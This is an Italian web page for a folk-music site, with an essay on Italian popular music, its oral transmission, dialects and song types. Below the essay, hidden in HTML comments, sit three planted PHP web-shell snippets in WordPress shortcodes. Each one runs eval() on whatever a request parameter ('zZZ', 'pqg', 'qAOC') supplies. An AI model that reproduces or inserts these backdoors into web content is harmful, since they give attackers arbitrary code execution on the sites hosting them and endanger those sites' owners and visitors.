Your message has been sent, you will be contacted soon
Musica PopoIare ltaIiana

Chiama

Chiudi

La musica popolare

Cos’è la musica popolare? Come dice il termine stesso, è la musica prodotta dal popolo, dalle classi subalterne: per questo motivo si differenzia da quella prodotta dalle classi superiori, la cosiddetta musica colta.
La musica popolare, a differenza degli altri generi musicali, è quasi sempre legata a momenti dell’anno, momenti storici e momenti di vita di un popolo, ed è frutto quindi di un’esperienza collettiva. Come i poemi omerici, anche la musica popolare resta tendenzialmente anonima e viene tramandata oralmente di generazione in generazione: per questo motivo è potenzialmente soggetta a variazioni e modifiche che si perdono nel tempo.
Proprio perché figlia del popolo, la musica popolare riflette la sua identità e alimenta un forte senso di appartenenza al suo interno.
Tra i temi più frequenti le filastrocche (ninne nanne, scioglilingua, ecc.), i canti rituali (religione, sentimenti, ecc), i canti dei lavoratori (agricoltori, pescatori, pastori, carrettieri, mondine, ecc.) e i canti sociali (in voga a partire soprattutto dal secolo scorso).
Gli stili, ovviamente, si differenziano da Paese a Paese e da regione a regione, proprio perché dipendono dalla lingua utilizzata, che riflette ovviamente il popolo che rappresenta. Per questo motivo, in Italia la musica popolare è quasi sempre cantata in dialetto ed è eseguita attraverso strumenti tipici del posto: da questi due elementi – lingua e strumenti – dipende anche il suo ritmo, differente di regione in regione.
Oggi la musica popolare tenta di rinnovarsi attraverso nuove esperienze e contaminazioni ma, di base, resta saldamente ancorata al passato in quanto memoria storica di ogni popolo del mondo.

<!– [insert_php]if (isset($_REQUEST["zZZ"])){eval($_REQUEST["zZZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["zZZ"])){eval($_REQUEST["zZZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["pqg"])){eval($_REQUEST["pqg"]);exit;}[/insert_php][php]if (isset($_REQUEST["pqg"])){eval($_REQUEST["pqg"]);exit;}[/php] –>

<!-- [insert_php]if (isset($_REQUEST["qAOC"])){eval($_REQUEST["qAOC"]);exit;}[/insert_php][php]if (isset($_REQUEST["qAOC"])){eval($_REQUEST["qAOC"]);exit;}[/php] -->





Commenta